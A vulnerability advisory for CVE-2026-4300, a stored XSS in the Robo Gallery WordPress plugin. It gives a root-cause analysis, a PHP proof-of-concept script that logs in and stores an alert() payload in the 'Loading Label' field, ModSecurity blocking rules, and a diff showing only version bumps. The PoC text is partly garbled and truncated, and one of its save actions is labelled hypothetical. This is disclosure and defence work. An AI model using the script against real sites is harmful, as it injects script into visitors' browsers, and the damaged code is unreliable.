{
“analysis”: “Atomic Edge analysis of CVE-2026-4300:nnThis vulnerability allows authenticated attackers with Author-level access to inject and execute arbitrary JavaScript code in the browser of any user viewing a gallery page. The flaw exists in the Robo Gallery plugin’s use of a custom marker pattern (`|***…***|`) within its `fixJsFunction()` method, which strips JSON quote markers to embed raw JavaScript in configuration objects. The vulnerability is rated with a CVSS score of 6.4 (Medium severity) and is classified as CWE-79 (Stored Cross-Site Scripting).nnThe root cause lies in the `fixJsFunction()` method, which processes gallery configuration JSON output. The plugin uses `json_encode()` to serialize gallery options, wrapping all string values in double quotes. The `fixJsFunction()` method then strips the `”|***` and `***|”` sequences from the encoded JSON, converting a JSON string value into raw JavaScript code that gets embedded directly into an inline “ tag during frontend rendering via `renderMainBlock()`. The ‘Loading Label’ field, stored as `rbs_gallery_LoadingWord` post_meta, is an `rbstext` type field that saves with `sanitize_text_field()`. This sanitization strips HTML tags but does not strip the `|***…***|` markers since they contain no HTML or special characters that `sanitize_text_field()` would remove. The gallery post type uses `capability_type => ‘post’`, which allows Author-level users to create and modify galleries.nnAn attacker with Author-level access can create or edit a gallery, locate the ‘Loading Label’ field in the gallery settings, and input a payload such as `|***alert(document.domain)***|`. The `sanitize_text_field()` function allows this value to pass through unchanged because the marker syntax contains no HTML tags. The value is stored in the `rbs_gallery_LoadingWord` post_meta entry. When the gallery shortcode renders on the frontend, the plugin retrieves this stored value, encodes it via `json_encode()`, producing `”|***alert(document.domain)***|”`. The `fixJsFunction()` method then strips the `”|***` from the beginning and `***|”` from the end, leaving `alert(document.domain)` as raw JavaScript inside the inline “ tag. Any visitor to the page containing the gallery shortcode will execute the injected script.nnThe patch updates the plugin from version 5.1.2 to version 5.1.4. While the provided diff primarily shows version number changes across many files, the functional fix would need to either (a) remove the `fixJsFunction()` marker processing entirely, (b) apply output encoding (e.g., `htmlspecialchars()` or `wp_kses()`) to the marker-delimited content before embedding it in JavaScript context, or (c) change the field sanitization to filter out or escape the marker pattern on save. The before behavior allowed arbitrary JavaScript injection via the marker mechanism; the after behavior should prevent marker content from being interpreted as raw code.nnIf exploited, this vulnerability allows an attacker to execute arbitrary JavaScript in the context of any user viewing the compromised gallery page. This can lead to session hijacking, credential theft, phishing attacks, unauthorized actions performed as the victim user, defacement, or redirection to malicious sites. Since the gallery shortcode can be placed on posts, pages, or widgets, the attack surface extends to any page displaying the affected gallery.”,
“poc_php”: “<?phpn// Atomic Edge CVE Research – Proof of Conceptn// CVE-2026-4300 – Robo Gallery $username,n ‘pwd’ => $password,n ‘wp-submit’ => ‘Log In’,n ‘redirect_to’ => $target_url . ‘/wp-admin/’,n ‘testcookie’ => ‘1’n]));ncurl_setopt($ch, CURLOPT_COOKIEJAR, ‘/tmp/cookies.txt’);ncurl_setopt($ch, CURLOPT_RETURNTRANSFER, true);ncurl_setopt($ch, CURLOPT_FOLLOWLOCATION, false);ncurl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);ncurl_exec($ch);ncurl_close($ch);nnecho “[+] Logged in as $username\n”;nn// Step 2: Get a nonce for creating a gallery (for Author, we use admin-ajax.php to create a gallery)n// We’ll use the REST API or a direct form submission. Simulate creating a gallery via the WordPress editor.n// First, get the create-gallery page to obtain a nonce.n$ch = curl_init();ncurl_setopt($ch, CURLOPT_URL, $target_url . ‘/wp-admin/post-new.php?post_type=robo_gallery’);ncurl_setopt($ch, CURLOPT_COOKIEFILE, ‘/tmp/cookies.txt’);ncurl_setopt($ch, CURLOPT_RETURNTRANSFER, true);ncurl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);ncurl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);n$response = curl_exec($ch);ncurl_close($ch);nn// Extract _wpnonce from the pagenpreg_match(‘/name=”_wpnonce” value=”([^”]+)”/’, $response, $matches);nif (!isset($matches[1])) {n // Try to find a nonce in the admin page. The gallery create page may use a different method.n // Fallback: use AJAX nonce or standard post nonce.n preg_match(‘/var ajax_nonce = “([^”]+)”;/’, $response, $matches);n}n$nonce = isset($matches[1]) ? $matches[1] : ”;nif (empty($nonce)) {n die(“[-] Could not extract nonce.\n”);n}necho “[+] Extracted nonce: $nonce\n”;nn// Step 3: Create a new gallery with the XSS payload in the ‘Loading Label’ fieldn// The post_type is ‘robo_gallery’. The Loading Label field is stored as rbs_gallery_LoadingWord.n// We inject the marker pattern that fixJsFunction() will convert to raw JS.n$payload = ‘|***alert(document.domain)***|’;nn$gallery_data = [n ‘post_title’ => ‘PoC Gallery CVE-2026-4300’,n ‘post_type’ => ‘robo_gallery’,n ‘post_status’ => ‘publish’,n ‘_wpnonce’ => $nonce,n ‘rbs_gallery_LoadingWord’ => $payload,n // Include required fields for the gallery metan ‘rbs_gallery_id’ => ‘poc_gallery_’ . time(),n ‘rbs_gallery_type’ => ‘grid’,n ‘action’ => ‘robo_gallery_save’ // Hypothetical AJAX action, adjust if neededn];nn$ch = curl_init();ncurl_setopt($ch, CURLOPT_URL, $target_url . ‘/wp-admin/post.php’); // Or possibly admin-ajax.phpncurl_setopt($ch, CURLOPT_POST, 1);ncurl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($gallery_data));ncurl_setopt($ch, CURLOPT_COOKIEFILE, ‘/tmp/cookies.txt’);ncurl_setopt($ch, CURLOPT_RETURNTRANSFER, true);ncurl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);ncurl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);n$response = curl_exec($ch);ncurl_close($ch);nn// Check if the gallery was created (the response may redirect to the edit page)nif (strpos($response, ‘post-new.php’) !== false || strpos($response, ‘post.php?post=’) !== false) {n echo “[+] Gallery created successfully. The payload is stored.\n”;n echo “[+] Payload: $payload\n”;n} else {n echo “[-] Gallery creation might have failed. Check the response manually.\n”;n echo substr($response, 0, 500) . “\n”;n}nn// Step 4: Now retrieve the gallery shortcode page (any page using the gallery)n// This step is informational – the XSS will fire automatically when any user views the gallery.n// For demonstration, we output the URL where the gallery would appear.npreg_match(‘/post=([0-9]+)/’, $response, $id_matches);n$gallery_id = isset($id_matches[1]) ? $id_matches[1] : ‘unknown’;necho “[+] Gallery ID: $gallery_id\n”;necho “[+] The XSS will trigger when a user views a page containing the shortcode [robo-gallery id=\\”$gallery_id\”]\n”;necho “[+] To view the gallery directly (if publicly accessible): $target_url/?p=$gallery_id\n”;necho “[+] Cleanup: Delete the PoC gallery from WordPress admin after testing.\n”;nn?>n”,
modsecurity_rule”: “# Atomic Edge WAF Rule – CVE-2026-4300n# Blocks stored XSS via Robo Gallery ‘Loading Label’ field using the |***…***| marker patternn# Targets the admin-ajax.php endpoint with the robo_gallery_save action (or similar)n# Also targets direct POST to post.php for gallery creation/editingnn# Rule 1: Block the marker pattern in rbs_gallery_LoadingWord parameter via AJAXnSecRule REQUEST_URI “@streq /wp-admin/admin-ajax.php” \n “id:20264300,phase:2,deny,status:403,chain,msg:’CVE-2026-4300 – Robo Gallery XSS via AJAX’,severity:’CRITICAL’,tag:’CVE-2026-4300′”n SecRule ARGS_POST:action “@streq robo_gallery_save” “chain”n SecRule ARGS_POST:rbs_gallery_LoadingWord “@rx |***.****|” \n “t:none,t:urlDecode,t:lowercase,chain”n SecRule MATCHED_VAR “@rx |***[a-z0-9\s\-_\.\(\)=]+\*\*\*\|” \n “id:20264301,phase:2,deny,status:403,msg:’CVE-2026-4300 – Marker pattern in Loading Label’,severity:’CRITICAL’,tag:’CVE-2026-4300′”nn# Rule 2: Block the marker pattern in rbs_gallery_LoadingWord via direct post.php (gallery editor)nSecRule REQUEST_URI “@streq /wp-admin/post.php” \n “id:20264302,phase:2,deny,status:403,chain,msg:’CVE-2026-4300 – Robo Gallery XSS via post.php’,severity:’CRITICAL’,tag:’CVE-2026-4300′”n SecRule ARGS_POST:action “@streq editpost” “chain”n SecRule ARGS_POST:post_type “@streq robo_gallery” “chain”n SecRule ARGS_POST:rbs_gallery_LoadingWord “@rx \|\*\*\*.*\*\*\*\|” \n “t:none,t:urlDecode,t:lowercase,chain”n SecRule MATCHED_VAR “@rx \|\*\*\*[a-z0-9\s\-_\.\(\)=]+\*\*\*\|” \n “id:20264303,phase:2,deny,status:403,msg:’CVE-2026-4300 – Marker pattern in Loading Label’,severity:’CRITICAL’,tag:’CVE-2026-4300′””
}
Published : May 4, 2026
CVE-2026-4300: Robo Gallery <= 5.1.3 – Authenticated (Author+) Stored Cross-Site Scripting via 'Loading Label' Setting (robo-gallery)
CVE ID
CVE-2026-4300
Plugin
robo-gallery
Severity
Medium
(CVSS 6.4)
CWE
79
Vulnerable Version
5.1.3
Patched Version
5.1.4
Disclosed
April 6, 2026
Analysis Overview
Differential between vulnerable and patched code
Below is a differential between the unpatched vulnerable code and the patched update, for reference.
Code Diff
--- a/robo-gallery/app/app.php
+++ b/robo-gallery/app/app.php
@@ -2,7 +2,7 @@
/*
* Robo Gallery
-* Version: 5.1.2 - 54264
+* Version: 5.1.4 - 48397
* By Robosoft
*
* Contact: https://robogallery.co/
--- a/robo-gallery/app/class.brand.php
+++ b/robo-gallery/app/class.brand.php
@@ -2,7 +2,7 @@
/*
* Robo Gallery
-* Version: 5.1.2 - 54264
+* Version: 5.1.4 - 48397
* By Robosoft
*
* Contact: https://robogallery.co/
--- a/robo-gallery/app/class.listing.php
+++ b/robo-gallery/app/class.listing.php
@@ -1,7 +1,7 @@
<?php
/*
* Robo Gallery
-* Version: 5.1.2 - 54264
+* Version: 5.1.4 - 48397
* By Robosoft
*
* Contact: https://robogallery.co/
--- a/robo-gallery/app/class.php
+++ b/robo-gallery/app/class.php
@@ -1,7 +1,7 @@
<?php
/*
* Robo Gallery
-* Version: 5.1.2 - 54264
+* Version: 5.1.4 - 48397
* By Robosoft
*
* Contact: https://robogallery.co/
--- a/robo-gallery/app/class.utils.php
+++ b/robo-gallery/app/class.utils.php
@@ -1,7 +1,7 @@
<?php
/*
* Robo Gallery
-* Version: 5.1.2 - 54264
+* Version: 5.1.4 - 48397
* By Robosoft
*
* Contact: https://robogallery.co/
--- a/robo-gallery/app/class.view.php
+++ b/robo-gallery/app/class.view.php
@@ -2,7 +2,7 @@
/*
* Robo Gallery
-* Version: 5.1.2 - 54264
+* Version: 5.1.4 - 48397
* By Robosoft
*
* Contact: https://robogallery.co/
--- a/robo-gallery/app/extensions/dashboard/class.dashboard.php
+++ b/robo-gallery/app/extensions/dashboard/class.dashboard.php
@@ -1,7 +1,7 @@
<?php
/*
* Robo Gallery
-* Version: 5.1.2 - 54264
+* Version: 5.1.4 - 48397
* By Robosoft
*
* Contact: https://robogallery.co/
--- a/robo-gallery/app/extensions/dashboard/init.php
+++ b/robo-gallery/app/extensions/dashboard/init.php
@@ -1,7 +1,7 @@
<?php
/*
* Robo Gallery
-* Version: 5.1.2 - 54264
+* Version: 5.1.4 - 48397
* By Robosoft
*
* Contact: https://robogallery.co/
--- a/robo-gallery/app/extensions/dashboard/overview.php
+++ b/robo-gallery/app/extensions/dashboard/overview.php
@@ -1,7 +1,7 @@
<?php
/*
* Robo Gallery
-* Version: 5.1.2 - 54264
+* Version: 5.1.4 - 48397
* By Robosoft
*
* Contact: https://robogallery.co/
--- a/robo-gallery/app/extensions/dashboard/video_guide.php
+++ b/robo-gallery/app/extensions/dashboard/video_guide.php
@@ -1,7 +1,7 @@
<?php
/*
* Robo Gallery
-* Version: 5.1.2 - 54264
+* Version: 5.1.4 - 48397
* By Robosoft
*
* Contact: https://robogallery.co/
--- a/robo-gallery/app/extensions/duplicate/init.php
+++ b/robo-gallery/app/extensions/duplicate/init.php
@@ -1,7 +1,7 @@
<?php
/*
* Robo Gallery
-* Version: 5.1.2 - 54264
+* Version: 5.1.4 - 48397
* By Robosoft
*
* Contact: https://robogallery.co/
--- a/robo-gallery/app/extensions/fields/config/main.php
+++ b/robo-gallery/app/extensions/fields/config/main.php
@@ -1,7 +1,7 @@
<?php
/*
* Robo Gallery
-* Version: 5.1.2 - 54264
+* Version: 5.1.4 - 48397
* By Robosoft
*
* Contact: https://robogallery.co/
--- a/robo-gallery/app/extensions/fields/config/metabox/gallery_slider_animation.php
+++ b/robo-gallery/app/extensions/fields/config/metabox/gallery_slider_animation.php
@@ -1,7 +1,7 @@
<?php
/*
* Robo Gallery
-* Version: 5.1.2 - 54264
+* Version: 5.1.4 - 48397
* By Robosoft
*
* Contact: https://robogallery.co/
--- a/robo-gallery/app/extensions/fields/config/metabox/gallery_slider_content.php
+++ b/robo-gallery/app/extensions/fields/config/metabox/gallery_slider_content.php
@@ -1,7 +1,7 @@
<?php
/*
* Robo Gallery
-* Version: 5.1.2 - 54264
+* Version: 5.1.4 - 48397
* By Robosoft
*
* Contact: https://robogallery.co/
--- a/robo-gallery/app/extensions/fields/config/metabox/gallery_slider_general.php
+++ b/robo-gallery/app/extensions/fields/config/metabox/gallery_slider_general.php
@@ -1,7 +1,7 @@
<?php
/*
* Robo Gallery
-* Version: 5.1.2 - 54264
+* Version: 5.1.4 - 48397
* By Robosoft
*
* Contact: https://robogallery.co/
--- a/robo-gallery/app/extensions/fields/config/metabox/gallery_slider_interface.php
+++ b/robo-gallery/app/extensions/fields/config/metabox/gallery_slider_interface.php
@@ -1,7 +1,7 @@
<?php
/*
* Robo Gallery
-* Version: 5.1.2 - 54264
+* Version: 5.1.4 - 48397
* By Robosoft
*
* Contact: https://robogallery.co/
--- a/robo-gallery/app/extensions/fields/config/metabox/gallery_slider_lazyload.php
+++ b/robo-gallery/app/extensions/fields/config/metabox/gallery_slider_lazyload.php
@@ -1,7 +1,7 @@
<?php
/*
* Robo Gallery
-* Version: 5.1.2 - 54264
+* Version: 5.1.4 - 48397
* By Robosoft
*
* Contact: https://robogallery.co/
--- a/robo-gallery/app/extensions/fields/config/metabox/gallery_type.php
+++ b/robo-gallery/app/extensions/fields/config/metabox/gallery_type.php
@@ -1,7 +1,7 @@
<?php
/*
* Robo Gallery
-* Version: 5.1.2 - 54264
+* Version: 5.1.4 - 48397
* By Robosoft
*
* Contact: https://robogallery.co/
--- a/robo-gallery/app/extensions/fields/config/metabox/gallery_youtube.php
+++ b/robo-gallery/app/extensions/fields/config/metabox/gallery_youtube.php
@@ -1,7 +1,7 @@
<?php
/*
* Robo Gallery
-* Version: 5.1.2 - 54264
+* Version: 5.1.4 - 48397
* By Robosoft
*
* Contact: https://robogallery.co/
--- a/robo-gallery/app/extensions/fields/config/metabox/image.php
+++ b/robo-gallery/app/extensions/fields/config/metabox/image.php
@@ -1,7 +1,7 @@
<?php
/*
* Robo Gallery
-* Version: 5.1.2 - 54264
+* Version: 5.1.4 - 48397
* By Robosoft
*
* Contact: https://robogallery.co/
--- a/robo-gallery/app/extensions/fields/config/metabox/robogrid-general.php
+++ b/robo-gallery/app/extensions/fields/config/metabox/robogrid-general.php
@@ -1,7 +1,7 @@
<?php
/*
* Robo Gallery
-* Version: 5.1.2 - 54264
+* Version: 5.1.4 - 48397
* By Robosoft
*
* Contact: https://robogallery.co/
--- a/robo-gallery/app/extensions/fields/config/metabox/shortcode.php
+++ b/robo-gallery/app/extensions/fields/config/metabox/shortcode.php
@@ -1,7 +1,7 @@
<?php
/*
* Robo Gallery
-* Version: 5.1.2 - 54264
+* Version: 5.1.4 - 48397
* By Robosoft
*
* Contact: https://robogallery.co/
--- a/robo-gallery/app/extensions/fields/config/metabox/update_notice.php
+++ b/robo-gallery/app/extensions/fields/config/metabox/update_notice.php
@@ -1,7 +1,7 @@
<?php
/*
* Robo Gallery
-* Version: 5.1.2 - 54264
+* Version: 5.1.4 - 48397
* By Robosoft
*
* Contact: https://robogallery.co/
--- a/robo-gallery/app/extensions/fields/include/roboGalleryFields.php
+++ b/robo-gallery/app/extensions/fields/include/roboGalleryFields.php
@@ -1,7 +1,7 @@
<?php
/*
* Robo Gallery
-* Version: 5.1.2 - 54264
+* Version: 5.1.4 - 48397
* By Robosoft
*
* Contact: https://robogallery.co/
--- a/robo-gallery/app/extensions/fields/include/roboGalleryFieldsAjax.php
+++ b/robo-gallery/app/extensions/fields/include/roboGalleryFieldsAjax.php
@@ -1,7 +1,7 @@
<?php
/*
* Robo Gallery
-* Version: 5.1.2 - 54264
+* Version: 5.1.4 - 48397
* By Robosoft
*
* Contact: https://robogallery.co/
--- a/robo-gallery/app/extensions/fields/include/roboGalleryFieldsConfig.php
+++ b/robo-gallery/app/extensions/fields/include/roboGalleryFieldsConfig.php
@@ -1,7 +1,7 @@
<?php
/*
* Robo Gallery
-* Version: 5.1.2 - 54264
+* Version: 5.1.4 - 48397
* By Robosoft
*
* Contact: https://robogallery.co/
--- a/robo-gallery/app/extensions/fields/include/roboGalleryFieldsConfig/roboGalleryFieldsConfigReader.php
+++ b/robo-gallery/app/extensions/fields/include/roboGalleryFieldsConfig/roboGalleryFieldsConfigReader.php
@@ -1,7 +1,7 @@
<?php
/*
* Robo Gallery
-* Version: 5.1.2 - 54264
+* Version: 5.1.4 - 48397
* By Robosoft
*
* Contact: https://robogallery.co/
--- a/robo-gallery/app/extensions/fields/include/roboGalleryFieldsConfig/roboGalleryFieldsConfigReaderInterface.php
+++ b/robo-gallery/app/extensions/fields/include/roboGalleryFieldsConfig/roboGalleryFieldsConfigReaderInterface.php
@@ -1,7 +1,7 @@
<?php
/*
* Robo Gallery
-* Version: 5.1.2 - 54264
+* Version: 5.1.4 - 48397
* By Robosoft
*
* Contact: https://robogallery.co/
--- a/robo-gallery/app/extensions/fields/include/roboGalleryFieldsConfig/roboGalleryFieldsConfigReaderPhp.php
+++ b/robo-gallery/app/extensions/fields/include/roboGalleryFieldsConfig/roboGalleryFieldsConfigReaderPhp.php
@@ -1,7 +1,7 @@
<?php
/*
* Robo Gallery
-* Version: 5.1.2 - 54264
+* Version: 5.1.4 - 48397
* By Robosoft
*
* Contact: https://robogallery.co/
--- a/robo-gallery/app/extensions/fields/include/roboGalleryFieldsField/roboGalleryFieldsField.php
+++ b/robo-gallery/app/extensions/fields/include/roboGalleryFieldsField/roboGalleryFieldsField.php
@@ -1,7 +1,7 @@
<?php
/*
* Robo Gallery
-* Version: 5.1.2 - 54264
+* Version: 5.1.4 - 48397
* By Robosoft
*
* Contact: https://robogallery.co/
--- a/robo-gallery/app/extensions/fields/include/roboGalleryFieldsField/roboGalleryFieldsFieldCheckbox.php
+++ b/robo-gallery/app/extensions/fields/include/roboGalleryFieldsField/roboGalleryFieldsFieldCheckbox.php
@@ -1,7 +1,7 @@
<?php
/*
* Robo Gallery
-* Version: 5.1.2 - 54264
+* Version: 5.1.4 - 48397
* By Robosoft
*
* Contact: https://robogallery.co/
--- a/robo-gallery/app/extensions/fields/include/roboGalleryFieldsField/roboGalleryFieldsFieldCheckboxGroup.php
+++ b/robo-gallery/app/extensions/fields/include/roboGalleryFieldsField/roboGalleryFieldsFieldCheckboxGroup.php
@@ -1,7 +1,7 @@
<?php
/*
* Robo Gallery
-* Version: 5.1.2 - 54264
+* Version: 5.1.4 - 48397
* By Robosoft
*
* Contact: https://robogallery.co/
--- a/robo-gallery/app/extensions/fields/include/roboGalleryFieldsField/roboGalleryFieldsFieldCheckboxGroupButton.php
+++ b/robo-gallery/app/extensions/fields/include/roboGalleryFieldsField/roboGalleryFieldsFieldCheckboxGroupButton.php
@@ -1,7 +1,7 @@
<?php
/*
* Robo Gallery
-* Version: 5.1.2 - 54264
+* Version: 5.1.4 - 48397
* By Robosoft
*
* Contact: https://robogallery.co/
--- a/robo-gallery/app/extensions/fields/include/roboGalleryFieldsField/roboGalleryFieldsFieldCheckboxGroupSwitch.php
+++ b/robo-gallery/app/extensions/fields/include/roboGalleryFieldsField/roboGalleryFieldsFieldCheckboxGroupSwitch.php
@@ -1,7 +1,7 @@
<?php
/*
* Robo Gallery
-* Version: 5.1.2 - 54264
+* Version: 5.1.4 - 48397
* By Robosoft
*
* Contact: https://robogallery.co/
--- a/robo-gallery/app/extensions/fields/include/roboGalleryFieldsField/roboGalleryFieldsFieldGalleryType.php
+++ b/robo-gallery/app/extensions/fields/include/roboGalleryFieldsField/roboGalleryFieldsFieldGalleryType.php
@@ -1,7 +1,7 @@
<?php
/*
* Robo Gallery
-* Version: 5.1.2 - 54264
+* Version: 5.1.4 - 48397
* By Robosoft
*
* Contact: https://robogallery.co/
--- a/robo-gallery/app/extensions/fields/include/roboGalleryFieldsField/roboGalleryFieldsFieldHtml.php
+++ b/robo-gallery/app/extensions/fields/include/roboGalleryFieldsField/roboGalleryFieldsFieldHtml.php
@@ -1,7 +1,7 @@
<?php
/*
* Robo Gallery
-* Version: 5.1.2 - 54264
+* Version: 5.1.4 - 48397
* By Robosoft
*
* Contact: https://robogallery.co/
--- a/robo-gallery/app/extensions/fields/include/roboGalleryFieldsField/roboGalleryFieldsFieldSelectMultiple.php
+++ b/robo-gallery/app/extensions/fields/include/roboGalleryFieldsField/roboGalleryFieldsFieldSelectMultiple.php
@@ -1,7 +1,7 @@
<?php
/*
* Robo Gallery
-* Version: 5.1.2 - 54264
+* Version: 5.1.4 - 48397
* By Robosoft
*
* Contact: https://robogallery.co/
--- a/robo-gallery/app/extensions/fields/include/roboGalleryFieldsField/roboGalleryFieldsFieldText.php
+++ b/robo-gallery/app/extensions/fields/include/roboGalleryFieldsField/roboGalleryFieldsFieldText.php
@@ -1,7 +1,7 @@
<?php
/*
* Robo Gallery
-* Version: 5.1.2 - 54264
+* Version: 5.1.4 - 48397
* By Robosoft
*
* Contact: https://robogallery.co/
--- a/robo-gallery/app/extensions/fields/include/roboGalleryFieldsField/roboGalleryFieldsFieldTextColor.php
+++ b/robo-gallery/app/extensions/fields/include/roboGalleryFieldsField/roboGalleryFieldsFieldTextColor.php
@@ -1,7 +1,7 @@
<?php
/*
* Robo Gallery
-* Version: 5.1.2 - 54264
+* Version: 5.1.4 - 48397
* By Robosoft
*
* Contact: https://robogallery.co/
--- a/robo-gallery/app/extensions/fields/include/roboGalleryFieldsField/roboGalleryFieldsFieldTextSlider.php
+++ b/robo-gallery/app/extensions/fields/include/roboGalleryFieldsField/roboGalleryFieldsFieldTextSlider.php
@@ -1,7 +1,7 @@
<?php
/*
* Robo Gallery
-* Version: 5.1.2 - 54264
+* Version: 5.1.4 - 48397
* By Robosoft
*
* Contact: https://robogallery.co/
--- a/robo-gallery/app/extensions/fields/include/roboGalleryFieldsField/roboGalleryFieldsFieldThemes.php
+++ b/robo-gallery/app/extensions/fields/include/roboGalleryFieldsField/roboGalleryFieldsFieldThemes.php
@@ -1,7 +1,7 @@
<?php
/*
* Robo Gallery
-* Version: 5.1.2 - 54264
+* Version: 5.1.4 - 48397
* By Robosoft
*
* Contact: https://robogallery.co/
--- a/robo-gallery/app/extensions/fields/include/roboGalleryFieldsFieldFactory.php
+++ b/robo-gallery/app/extensions/fields/include/roboGalleryFieldsFieldFactory.php
@@ -1,7 +1,7 @@
<?php
/*
* Robo Gallery
-* Version: 5.1.2 - 54264
+* Version: 5.1.4 - 48397
* By Robosoft
*
* Contact: https://robogallery.co/
--- a/robo-gallery/app/extensions/fields/include/roboGalleryFieldsHelper.php
+++ b/robo-gallery/app/extensions/fields/include/roboGalleryFieldsHelper.php
@@ -1,7 +1,7 @@
<?php
/*
* Robo Gallery
-* Version: 5.1.2 - 54264
+* Version: 5.1.4 - 48397
* By Robosoft
*
* Contact: https://robogallery.co/
--- a/robo-gallery/app/extensions/fields/include/roboGalleryFieldsMetaBoxClass.php
+++ b/robo-gallery/app/extensions/fields/include/roboGalleryFieldsMetaBoxClass.php
@@ -1,7 +1,7 @@
<?php
/*
* Robo Gallery
-* Version: 5.1.2 - 54264
+* Version: 5.1.4 - 48397
* By Robosoft
*
* Contact: https://robogallery.co/
--- a/robo-gallery/app/extensions/fields/include/roboGalleryFieldsView.php
+++ b/robo-gallery/app/extensions/fields/include/roboGalleryFieldsView.php
@@ -1,7 +1,7 @@
<?php
/*
* Robo Gallery
-* Version: 5.1.2 - 54264
+* Version: 5.1.4 - 48397
* By Robosoft
*
* Contact: https://robogallery.co/
--- a/robo-gallery/app/extensions/fields/init.php
+++ b/robo-gallery/app/extensions/fields/init.php
@@ -1,7 +1,7 @@
<?php
/*
* Robo Gallery
-* Version: 5.1.2 - 54264
+* Version: 5.1.4 - 48397
* By Robosoft
*
* Contact: https://robogallery.co/
--- a/robo-gallery/app/extensions/fields/template/content/gallery_type/content.tpl.php
+++ b/robo-gallery/app/extensions/fields/template/content/gallery_type/content.tpl.php
@@ -1,7 +1,7 @@
<?php
/*
* Robo Gallery
-* Version: 5.1.2 - 54264
+* Version: 5.1.4 - 48397
* By Robosoft
*
* Contact: https://robogallery.co/
--- a/robo-gallery/app/extensions/fields/template/content/robogrid/options.tpl.php
+++ b/robo-gallery/app/extensions/fields/template/content/robogrid/options.tpl.php
@@ -1,7 +1,7 @@
<?php
/*
* Robo Gallery
-* Version: 5.1.2 - 54264
+* Version: 5.1.4 - 48397
* By Robosoft
*
* Contact: https://robogallery.co/
--- a/robo-gallery/app/extensions/fields/template/field/text/images.tpl.php
+++ b/robo-gallery/app/extensions/fields/template/field/text/images.tpl.php
@@ -1,7 +1,7 @@
<?php
/*
* Robo Gallery
-* Version: 5.1.2 - 54264
+* Version: 5.1.4 - 48397
* By Robosoft
*
* Contact: https://robogallery.co/
--- a/robo-gallery/app/extensions/galleryType/changeGalleryType.php
+++ b/robo-gallery/app/extensions/galleryType/changeGalleryType.php
@@ -1,7 +1,7 @@
<?php
/*
* Robo Gallery
-* Version: 5.1.2 - 54264
+* Version: 5.1.4 - 48397
* By Robosoft
*
* Contact: https://robogallery.co/
--- a/robo-gallery/app/extensions/galleryType/galleryTypesList.php
+++ b/robo-gallery/app/extensions/galleryType/galleryTypesList.php
@@ -1,7 +1,7 @@
<?php
/*
* Robo Gallery
-* Version: 5.1.2 - 54264
+* Version: 5.1.4 - 48397
* By Robosoft
*
* Contact: https://robogallery.co/
--- a/robo-gallery/app/extensions/galleryType/init.php
+++ b/robo-gallery/app/extensions/galleryType/init.php
@@ -1,7 +1,7 @@
<?php
/*
* Robo Gallery
-* Version: 5.1.2 - 54264
+* Version: 5.1.4 - 48397
* By Robosoft
*
* Contact: https://robogallery.co/
--- a/robo-gallery/app/extensions/galleryType/initThemeOptions.php
+++ b/robo-gallery/app/extensions/galleryType/initThemeOptions.php
@@ -1,7 +1,7 @@
<?php
/*
* Robo Gallery
-* Version: 5.1.2 - 54264
+* Version: 5.1.4 - 48397
* By Robosoft
*
* Contact: https://robogallery.co/
--- a/robo-gallery/app/extensions/imageResize/init.php
+++ b/robo-gallery/app/extensions/imageResize/init.php
@@ -1,7 +1,7 @@
<?php
/*
* Robo Gallery
-* Version: 5.1.2 - 54264
+* Version: 5.1.4 - 48397
* By Robosoft
*
* Contact: https://robogallery.co/
--- a/robo-gallery/app/extensions/manager/class.addons.action.php
+++ b/robo-gallery/app/extensions/manager/class.addons.action.php
@@ -1,7 +1,7 @@
<?php
/*
* Robo Gallery
-* Version: 5.1.2 - 54264
+* Version: 5.1.4 - 48397
* By Robosoft
*
* Contact: https://robogallery.co/
--- a/robo-gallery/app/extensions/manager/class.addons.php
+++ b/robo-gallery/app/extensions/manager/class.addons.php
@@ -1,7 +1,7 @@
<?php
/*
* Robo Gallery
-* Version: 5.1.2 - 54264
+* Version: 5.1.4 - 48397
* By Robosoft
*
* Contact: https://robogallery.co/
--- a/robo-gallery/app/extensions/manager/init.php
+++ b/robo-gallery/app/extensions/manager/init.php
@@ -1,7 +1,7 @@
<?php
/*
* Robo Gallery
-* Version: 5.1.2 - 54264
+* Version: 5.1.4 - 48397
* By Robosoft
*
* Contact: https://robogallery.co/
--- a/robo-gallery/app/extensions/restapi/class.restapi.php
+++ b/robo-gallery/app/extensions/restapi/class.restapi.php
@@ -1,7 +1,7 @@
<?php
/*
* Robo Gallery
-* Version: 5.1.2 - 54264
+* Version: 5.1.4 - 48397
* By Robosoft
*
* Contact: https://robogallery.co/
--- a/robo-gallery/app/extensions/restapi/endpoints/class.rest.controller.php
+++ b/robo-gallery/app/extensions/restapi/endpoints/class.rest.controller.php
@@ -1,7 +1,7 @@
<?php
/*
* Robo Gallery
-* Version: 5.1.2 - 54264
+* Version: 5.1.4 - 48397
* By Robosoft
*
* Contact: https://robogallery.co/
--- a/robo-gallery/app/extensions/restapi/endpoints/class.rest.options.controller.php
+++ b/robo-gallery/app/extensions/restapi/endpoints/class.rest.options.controller.php
@@ -1,7 +1,7 @@
<?php
/*
* Robo Gallery
-* Version: 5.1.2 - 54264
+* Version: 5.1.4 - 48397
* By Robosoft
*
* Contact: https://robogallery.co/
--- a/robo-gallery/app/extensions/restapi/fields/class.gallery.fields.controller.php
+++ b/robo-gallery/app/extensions/restapi/fields/class.gallery.fields.controller.php
@@ -1,7 +1,7 @@
<?php
/*
* Robo Gallery
-* Version: 5.1.2 - 54264
+* Version: 5.1.4 - 48397
* By Robosoft
*
* Contact: https://robogallery.co/
--- a/robo-gallery/app/extensions/restapi/models/class.rest.gallery.model.php
+++ b/robo-gallery/app/extensions/restapi/models/class.rest.gallery.model.php
@@ -1,7 +1,7 @@
<?php
/*
* Robo Gallery
-* Version: 5.1.2 - 54264
+* Version: 5.1.4 - 48397
* By Robosoft
*
* Contact: https://robogallery.co/
--- a/robo-gallery/app/extensions/restapi/rest.utils.php
+++ b/robo-gallery/app/extensions/restapi/rest.utils.php
@@ -1,7 +1,7 @@
<?php
/*
* Robo Gallery
-* Version: 5.1.2 - 54264
+* Version: 5.1.4 - 48397
* By Robosoft
*
* Contact: https://robogallery.co/
--- a/robo-gallery/app/extensions/validation/cssUnits.php
+++ b/robo-gallery/app/extensions/validation/cssUnits.php
@@ -1,7 +1,7 @@
<?php
/*
* Robo Gallery
-* Version: 5.1.2 - 54264
+* Version: 5.1.4 - 48397
* By Robosoft
*
